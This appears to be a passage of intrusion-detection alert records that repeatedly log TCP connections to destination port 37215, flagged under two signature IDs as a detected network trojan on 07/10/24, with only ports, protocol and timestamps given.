                  SID:2829579
                  Source Port:42218
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.022283
                  SID:2829579
                  Source Port:49568
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.155624
                  SID:2835222
                  Source Port:46868
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.858579
                  SID:2829579
                  Source Port:46598
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.462575
                  SID:2829579
                  Source Port:52254
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.188754
                  SID:2829579
                  Source Port:50414
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.792966
                  SID:2835222
                  Source Port:43592
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.170023
                  SID:2829579
                  Source Port:52748
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.361334
                  SID:2835222
                  Source Port:50900
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.759865
                  SID:2835222
                  Source Port:41030
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.362168
                  SID:2829579
                  Source Port:54416
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.757690
                  SID:2829579
                  Source Port:40252
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.462014
                  SID:2835222
                  Source Port:53326
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.194226
                  SID:2829579
                  Source Port:36792
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.840252
                  SID:2835222
                  Source Port:49002
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.234047
                  SID:2829579
                  Source Port:37682
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.919816
                  SID:2835222
                  Source Port:55002
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.324318
                  SID:2835222
                  Source Port:51218
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.268037
                  SID:2829579
                  Source Port:34096
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.133887
                  SID:2835222
                  Source Port:33244
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.163791
                  SID:2835222
                  Source Port:48610
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.728877
                  SID:2835222
                  Source Port:51414
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.254772
                  SID:2835222
                  Source Port:49796
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.039425
                  SID:2829579
                  Source Port:51250
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.613334
                  SID:2835222
                  Source Port:60188
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.583934
                  SID:2835222
                  Source Port:46630
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.768963
                  SID:2835222
                  Source Port:49156
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.784576
                  SID:2829579
                  Source Port:58464
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.063010
                  SID:2835222
                  Source Port:50066
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.251159
                  SID:2829579
                  Source Port:57172
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.626049
                  SID:2835222
                  Source Port:33596
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.775868
                  SID:2835222
                  Source Port:36596
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.813638
                  SID:2835222
                  Source Port:59926
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.694487
                  SID:2835222
                  Source Port:46314
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.812740
                  SID:2829579
                  Source Port:45286
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.592095
                  SID:2829579
                  Source Port:43410
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:44.567411
                  SID:2835222
                  Source Port:51124
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.592956
                  SID:2829579
                  Source Port:43348
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.279073
                  SID:2829579
                  Source Port:42784
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.895766
                  SID:2829579
                  Source Port:42928
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.778453
                  SID:2829579
                  Source Port:40426
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.921580
                  SID:2829579
                  Source Port:56594
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.130365
                  SID:2835222
                  Source Port:52112
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.927122
                  SID:2835222
                  Source Port:38678
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.789703
                  SID:2829579
                  Source Port:46150
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.850693
                  SID:2835222
                  Source Port:48818
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.273376
                  SID:2829579
                  Source Port:56446
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.330263
                  SID:2835222
                  Source Port:35348
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.367813
                  SID:2835222
                  Source Port:58020
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.151172
                  SID:2829579
                  Source Port:46290
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.828285
                  SID:2829579
                  Source Port:52040
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.464716
                  SID:2829579
                  Source Port:39564
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.079207
                  SID:2835222
                  Source Port:58402
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.598591
                  SID:2835222
                  Source Port:55986
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.005251
                  SID:2829579
                  Source Port:51872
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.861984
                  SID:2835222
                  Source Port:39510
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.576463
                  SID:2829579
                  Source Port:60660
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.290878
                  SID:2829579
                  Source Port:41268
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.198870
                  SID:2829579
                  Source Port:45238
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.905931
                  SID:2829579
                  Source Port:51244
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.585181
                  SID:2835222
                  Source Port:60286
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.849786
                  SID:2829579
                  Source Port:51966
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.013937
                  SID:2835222
                  Source Port:34014
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.539447
                  SID:2829579
                  Source Port:42124
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.596939
                  SID:2835222
                  Source Port:58804
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.411033
                  SID:2829579
                  Source Port:34672
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.647678
                  SID:2835222
                  Source Port:58578
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.834165
                  SID:2829579
                  Source Port:60418
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.575059
                  SID:2829579
                  Source Port:34430
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.782000
                  SID:2829579
                  Source Port:60806
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.644790
                  SID:2829579
                  Source Port:40644
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.121888
                  SID:2835222
                  Source Port:48472
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.609585
                  SID:2835222
                  Source Port:43840
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.114427
                  SID:2829579
                  Source Port:50744
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.842952
                  SID:2829579
                  Source Port:57532
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.831755
                  SID:2829579
                  Source Port:51844
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.420167
                  SID:2835222
                  Source Port:35802
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.425818
                  SID:2835222
                  Source Port:45446
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.592658
                  SID:2835222
                  Source Port:47728
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.248945
                  SID:2835222
                  Source Port:36886
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.649070
                  SID:2835222
                  Source Port:45426
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.946656
                  SID:2829579
                  Source Port:49306
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.410833
                  SID:2829579
                  Source Port:57550
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.771362
                  SID:2829579
                  Source Port:59940
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.781543
                  SID:2835222
                  Source Port:59960
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.347841
                  SID:2835222
                  Source Port:55014
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.641375
                  SID:2835222
                  Source Port:48384
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.318439
                  SID:2829579
                  Source Port:60484
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.506751
                  SID:2835222
                  Source Port:34374
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.341408
                  SID:2829579
                  Source Port:42568
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.631742
                  SID:2835222
                  Source Port:37796
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.816598
                  SID:2835222
                  Source Port:44560
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.094714
                  SID:2829579
                  Source Port:56750
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.574763
                  SID:2835222
                  Source Port:36850
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.777569
                  SID:2829579
                  Source Port:52170
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.937541
                  SID:2829579
                  Source Port:40800
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.503174
                  SID:2835222
                  Source Port:47486
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.951264
                  SID:2829579
                  Source Port:41630
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.986836
                  SID:2829579
                  Source Port:51572
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.310964
                  SID:2835222
                  Source Port:57546
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.882743
                  SID:2829579
                  Source Port:43052
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.807420
                  SID:2835222
                  Source Port:42460
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.525645
                  SID:2829579
                  Source Port:59994
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.833960
                  SID:2829579
                  Source Port:57890
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.952819
                  SID:2829579
                  Source Port:40778
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.282645
                  SID:2835222
                  Source Port:46916
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.391790
                  SID:2829579
                  Source Port:54542
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.855669
                  SID:2829579
                  Source Port:43248
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.351909
                  SID:2835222
                  Source Port:46824
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.011979
                  SID:2835222
                  Source Port:45410
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.532653
                  SID:2829579
                  Source Port:40450
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.560795
                  SID:2835222
                  Source Port:45486
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.177023
                  SID:2835222
                  Source Port:43310
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.944917
                  SID:2829579
                  Source Port:49870
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.855576
                  SID:2829579
                  Source Port:33842
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.821569
                  SID:2835222
                  Source Port:53650
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.406451
                  SID:2835222
                  Source Port:48026
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.010267
                  SID:2835222
                  Source Port:45984
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.012048
                  SID:2835222
                  Source Port:58506
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.794005
                  SID:2835222
                  Source Port:46092
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.758482
                  SID:2829579
                  Source Port:42894
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.933980
                  SID:2835222
                  Source Port:50890
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.610218
                  SID:2829579
                  Source Port:34920
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.538484
                  SID:2829579
                  Source Port:58434
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.601201
                  SID:2835222
                  Source Port:39508
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.485885
                  SID:2835222
                  Source Port:42944
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.342477
                  SID:2829579
                  Source Port:34764
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.387027
                  SID:2829579
                  Source Port:33508
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.849175
                  SID:2829579
                  Source Port:49598
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.357682
                  SID:2835222
                  Source Port:38184
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.442077
                  SID:2835222
                  Source Port:32874
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.633994
                  SID:2835222
                  Source Port:42286
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.780155
                  SID:2835222
                  Source Port:53260
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.941527
                  SID:2829579
                  Source Port:40538
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.631104
                  SID:2835222
                  Source Port:50842
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.575956
                  SID:2835222
                  Source Port:38292
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.867068
                  SID:2829579
                  Source Port:51838
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.572202
                  SID:2829579
                  Source Port:48692
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.743404
                  SID:2835222
                  Source Port:39520
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.465521
                  SID:2829579
                  Source Port:54522
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.403967
                  SID:2829579
                  Source Port:56848
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.852181
                  SID:2835222
                  Source Port:34576
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.667418
                  SID:2829579
                  Source Port:58102
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.770059
                  SID:2835222
                  Source Port:54950
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.570720
                  SID:2829579
                  Source Port:38250
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.065687
                  SID:2829579
                  Source Port:55924
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.917896
                  SID:2835222
                  Source Port:37138
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.802852
                  SID:2829579
                  Source Port:34280
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.369832
                  SID:2829579
                  Source Port:57878
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.429155
                  SID:2829579
                  Source Port:37298
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.297905
                  SID:2835222
                  Source Port:45766
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.110888
                  SID:2829579
                  Source Port:36932
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.423291
                  SID:2829579
                  Source Port:58296
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.617862
                  SID:2829579
                  Source Port:48940
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.558614
                  SID:2829579
                  Source Port:55748
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.171053
                  SID:2835222
                  Source Port:48436
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.088542
                  SID:2835222
                  Source Port:59854
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.213909
                  SID:2829579
                  Source Port:34384
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.545025
                  SID:2829579
                  Source Port:42550
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.226208
                  SID:2829579
                  Source Port:33520
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.856885
                  SID:2829579
                  Source Port:60372
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.583882
                  SID:2835222
                  Source Port:50332
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.863618
                  SID:2829579
                  Source Port:37176
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.602329
                  SID:2835222
                  Source Port:43760
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.803264
                  SID:2829579
                  Source Port:48012
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.083408
                  SID:2835222
                  Source Port:43228
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.786034
                  SID:2835222
                  Source Port:34168
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.449750
                  SID:2835222
                  Source Port:38438
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.831621
                  SID:2829579
                  Source Port:54106
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.542480
                  SID:2835222
                  Source Port:54548
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.948399
                  SID:2835222
                  Source Port:59734
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.851193
                  SID:2829579
                  Source Port:35406
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.822671
                  SID:2829579
                  Source Port:55622
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.256885
                  SID:2835222
                  Source Port:43114
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.832991
                  SID:2835222
                  Source Port:35786
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.411856
                  SID:2835222
                  Source Port:40902
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.776398
                  SID:2829579
                  Source Port:48704
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.262927
                  SID:2829579
                  Source Port:60662
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.878733
                  SID:2835222
                  Source Port:46574
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.378421
                  SID:2835222
                  Source Port:39972
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.088837
                  SID:2835222
                  Source Port:42970
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.333013
                  SID:2829579
                  Source Port:44702
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.165802
                  SID:2835222
                  Source Port:37698
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
